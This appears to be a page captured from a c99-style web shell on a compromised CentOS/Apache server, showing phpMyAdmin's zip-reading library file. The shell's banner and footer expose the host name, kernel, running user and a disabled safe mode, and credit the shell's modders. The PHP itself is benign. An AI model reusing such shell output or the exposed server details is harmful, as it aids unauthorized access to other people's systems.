!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)


Viewing file:     zip_extension.lib.php (3.45 KB)      -rw-r--r--
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */

/**
 * Interface for the zip extension
 * @package    phpMyAdmin
 */

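/**
 * Gets zip file contents
 *
 * Opens the archive and returns the data of a single entry: for an
 * OpenDocument spreadsheet (first entry reads as the ODS MIME type) the
 * 'content.xml' entry, otherwise the first entry of the archive.
 *
 * Each entry is read into memory in one call, sized by the value that
 * zip_entry_filesize() reports for it; this function applies no upper bound.
 * NOTE(review): if $file can be a user-supplied upload, a highly compressed
 * entry is limited only by PHP's memory_limit -- confirm that callers bound
 * the upload or check the declared size first.
 *
 * @param string $file path of the zip archive to read
 *
 * @return array array('error' => $error_message, 'data' => $file_data);
 *               'error' is an empty string if no error occurred
 */
function PMA_getZipContents($file)
{
    $error_message = '';
    $file_data = '';
    $zip_handle = zip_open($file);

    if (! is_resource($zip_handle)) {
        // zip_open() returned an integer error code instead of a handle, so
        // there is nothing to close: report the error and stop here.
        $error_message = __('Error in ZIP archive:') . ' ' . PMA_getZipError($zip_handle);
        return array('error' => $error_message, 'data' => $file_data);
    }

    $first_zip_entry = zip_read($zip_handle);
    if (false === $first_zip_entry) {
        $error_message = __('No files found inside ZIP archive!');
    } elseif (! is_resource($first_zip_entry)) {
        // zip_read() can also return an error code; do not treat it as an entry
        $error_message = __('Error in ZIP archive:') . ' ' . PMA_getZipError($first_zip_entry);
    } else {
        /* Is the zip really an ODS file? */
        $read = zip_entry_read($first_zip_entry);
        $ods_mime = 'application/vnd.oasis.opendocument.spreadsheet';
        if (strcmp($ods_mime, $read) === 0) {
            /* Return the correct contents, not just the first entry */
            while (true) {
                $entry = zip_read($zip_handle);
                if (! is_resource($entry)) {
                    /**
                     * Either we have reached the end of the zip and still
                     * haven't found 'content.xml' or there was a parsing
                     * error that we must display
                     */
                    if ($entry === false) {
                        $error_message = __('Error in ZIP archive:') . ' Could not find "content.xml"';
                    } else {
                        // the error code is the value zip_read() returned,
                        // not the archive handle
                        $error_message = __('Error in ZIP archive:') . ' ' . PMA_getZipError($entry);
                    }
                    break;
                }
                if (strcmp('content.xml', zip_entry_name($entry)) === 0) {
                    zip_entry_open($zip_handle, $entry, 'r');
                    $file_data = zip_entry_read($entry, zip_entry_filesize($entry));
                    zip_entry_close($entry);
                    break;
                }
            }
        } else {
            zip_entry_open($zip_handle, $first_zip_entry, 'r');
            /* File pointer has already been moved, so include what was read above */
            $file_data = $read;
            $file_data .= zip_entry_read($first_zip_entry, zip_entry_filesize($first_zip_entry));
            zip_entry_close($first_zip_entry);
        }
    }

    zip_close($zip_handle);
    return array('error' => $error_message, 'data' => $file_data);
}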

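/**
 * Gets zip error message
 *
 * Maps the ZipArchive::ER_* codes handled below to a short English message.
 * Any other value is returned as its string representation.
 *
 * @param integer $code error code
 *
 * @return string error message
 */
function PMA_getZipError($code)
{
    // I don't think this needs translation
    switch ($code) {
        case ZipArchive::ER_MULTIDISK:
            return 'Multi-disk zip archives not supported';
        case ZipArchive::ER_READ:
            return 'Read error';
        case ZipArchive::ER_CRC:
            return 'CRC error';
        case ZipArchive::ER_NOZIP:
            return 'Not a zip archive';
        case ZipArchive::ER_INCONS:
            return 'Zip archive inconsistent';
        default:
            // unknown code: hand it back as text so the return type stays a string
            return (string) $code;
    }
}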
?>


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0162 ]--